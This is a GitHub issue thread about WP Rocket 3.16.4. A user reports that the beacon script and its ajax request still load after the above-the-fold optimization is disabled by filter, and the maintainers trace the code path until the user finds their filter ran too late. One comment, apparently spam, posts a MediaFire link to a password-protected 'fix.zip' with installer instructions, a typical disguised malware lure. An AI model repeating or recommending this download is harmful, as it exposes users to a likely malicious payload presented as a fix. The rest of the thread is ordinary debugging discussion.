### ISSUE TITLE
3.16.4 Above_the_fold_optimization triggered and beacon loaded even if disabled

### ISSUE THREAD

**Issue by PaulSchiretz** [wp-media/wp-rocket#6918]
**Before submitting an issue please check that you’ve completed the following steps:**
- Using 3.16.4
- No issues was submitted till now

**Describe the bug**
When disabling the above_the_fold_optimization with this code `add_filter( 'rocket_above_the_fold_optimization', '__return_false' );` the the wpr-beacon.min.js is still injected into the source and an ajax request is triggered on every page call.

**To Reproduce**
1. add `add_filter( 'rocket_above_the_fold_optimization', '__return_false' );` to your functions.php or install the disable plugin provided.
2. Preload the page
3. See the ajax_requests and the wpr-beacon.min.js via chrome devtools for instance.

**Expected behavior**
When the rocket_above_the_fold_optimization is disabled no script should be injected and no ajax request triggered.

**Conclusion**
Would be really nice to not degrade the performance of a site if it doesn't use the rocket_above_the_fold_optimization. Can you please have a look at that?

Thanks,
Paul

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by piotrbak** [comment]
Hello @PaulSchiretz thanks for creating the issue. I was not able to reproduce the issue on our testing environment. We'd either need access to your website or having proper steps to reproduce it.

**Comment by PaulSchiretz** [comment]
Hi @piotrbak 

To reproduce the issue:
1. Delete all processed above the fold images
2. Add add_filter( 'rocket_above_the_fold_optimization', '__return_false' ); to disable the above the fold generation.
to your functions.php to disable the above the fold image generation.

Exact code used:
```
/*disable rocket_above the fold image optimization*/
add_filter('rocket_above_the_fold_optimization', 'custom_rocket_above_the_fold_optimization', 999, 1);
function custom_rocket_above_the_fold_optimization($enabled) {
    return false;
}
```

3. clear the cache
4. Visite the page in incognito mode, make sure you see the cached page and you'll see the beacon script is still injected in the html source, and the ajax request is fired:
`<script data-name="wpr-wpr-beacon" src="xxxx/wp-content/plugins/wp-rocket/assets/js/wpr-beacon.min.js" async="" beacon-completed="true"></script>`

Let me know if you need more info.

Cheers,
Paul

**Comment by piotrbak** [comment]
@PaulSchiretz There must be 3rd-party involved there, on the fresh site it works as expected.

**Comment by piotrbak** [comment]
We'll be happy to investigate this, but we'll need to have access to affected website

**Comment by PaulSchiretz** [comment]
Ok i debugged your code a little as, as of now i cannot give you direct access. 

The issue and solution is quite simple:

The beacon is injected via the maybe_apply_optimizations function in Common/PerformanceHints/Frontend/Processor.php Line 51.
```

	/**
	 * Apply Performance Hints Optimizations.
	 *
	 * @param string $html HTML content.
	 * @return string
	 */
	public function maybe_apply_optimizations( string $html ): string {
		if ( empty( $this->factories ) ) {
			return $html;
		}

		global $wp;

		$url       = untrailingslashit( home_url( add_query_arg( [], $wp->request ) ) );
		$is_mobile = $this->is_mobile();

		$html_optimized = null;
		foreach ( $this->factories as $factory ) {
			$row = $factory->queries()->get_row( $url, $is_mobile );
			if ( empty( $row ) ) {
				return $this->inject_beacon( $html, $url, $is_mobile );
			}

			$html           = $html_optimized ?? $html;
			$html_optimized = $factory->get_frontend_controller()->optimize( $html, $row );
		}

		return $html_optimized;
	}
```


Take e a look at Line 64.
You check if the result of the get_row Query is empty and if so inject the beacon.

BUT in the get_row function Line 24 in Engine/Commmon/Database/Queries/AbstractQuery which is called by the first snipped(`$row = $factory->queries()->get_row( $url, $is_mobile );`)

```
	/**
	 * Get row for specific url.
	 *
	 * @param string $url Page Url.
	 * @param bool   $is_mobile if the request is for mobile page.
	 *
	 * @return false|mixed
	 */
	public function get_row( string $url, bool $is_mobile = false ) {
		if ( ! self::$table_exists && ! $this->table_exists() ) {
			return false;
		}

		$query = $this->query(
			[
				'url'       => untrailingslashit( $url ),
				'is_mobile' => $is_mobile,
			]
		);

		if ( empty( $query[0] ) ) {
			return false;
		}

		return $query[0];
	}
```

you return FALSE if the table exists, which it does in my case - as i added the filter after running the wprocket upgrade - but there is no entry, if so you continue and inject the beacon snipped. CAUSE empty(false) in Line 64 of Common/PerformanceHints/Frontend/Processor.php evaluates to TRUE in php.

long story short:
empty(false) returns true in PHP that's why the snipped is always injected.

TRY:
Removing the filter rocket_above_the_fold_optimization so the table is created and add it back afterwards. Then you can reproduce the behaviour.

Cheers,
Paul

**Comment by piotrbak** [comment]
@MathieuLamiot Would you take a look at this one, whenever you can?

**Comment by MathieuLamiot** [comment]
I had a look.
Even on an already existing website with 3.16.4, with the above_the_fold table existing, I can't reproduce the issue.

@PaulSchiretz Thank you for the detailed debug. However, when the filter `rocket_above_the_fold_optimization` is used with the value `false` (as with the snippet you provided), this part of the code should not be executed at all so the root cause is not bad handling with empty(false), this actually behaves as expected. The issue you are facing must be happening before this. I'll provide you with some details about how it should work so that you can check the difference in your environment, as we can't reproduce on our side so likely there is a 3rd party interaction involved.

Once you set the `rocket_above_the_fold_optimization` to false:

The function `maybe_apply_optimization` should bail out early because `$this->factories` is empty.

https://github.com/wp-media/wp-rocket/blob/03881cdaaa14d34eb7d998bc0d66a17251a37f39/inc/Engine/Common/PerformanceHints/Frontend/Processor.php#L51-L54

Note that in my tests, I was able to confirm this by adding logs like this:

```
	public function maybe_apply_optimizations( string $html ): string {
		if ( empty( $this->factories ) ) {
			error_log("Bail out because no factories.");
			return $html;
		}

		$is_atf_enabled = apply_filters( 'rocket_above_the_fold_optimization', true );
		error_log("Before the injection, is atf enabled: $is_atf_enabled");
```
I never saw the log "Before the injection..." but could see plenty of "Bail out because no factories".

If `$this->factories` is not empty for you, you can investigate why and further check the following:

`$this->factories` should be set here:

https://github.com/wp-media/wp-rocket/blob/03881cdaaa14d34eb7d998bc0d66a17251a37f39/inc/Engine/Common/PerformanceHints/ServiceProvider.php#L59-L82

In 3.16.4, there is only one factory possible: the atf_factory. Before adding it, we check `$atf_factory->get_context()->is_allowed()` which should be this:

https://github.com/wp-media/wp-rocket/blob/03881cdaaa14d34eb7d998bc0d66a17251a37f39/inc/Engine/Media/AboveTheFold/Context/Context.php#L15-L33

So here, you have the link from using the filter to preventing the injection of the wpr-beacon script. As you can see, if the filtered value is false, then the atf_factory is not added to the factories and as a result, the `maybe_apply_optimizations` method bails out before injecting the script.

If indeed something goes wrong and you face a bug, we'll either need access to an environment that reproduces the issue (to understand the root cause) or get more details about why the code I presented here does not behave as expected.

Thanks a lot! I hope this can help.

**Comment by PaulSchiretz** [comment]
Hi @MathieuLamiot @piotrbak,

This issue is resolved my filter fired to late, all is good now!

Thanks and sorry for bothering you,
Paul
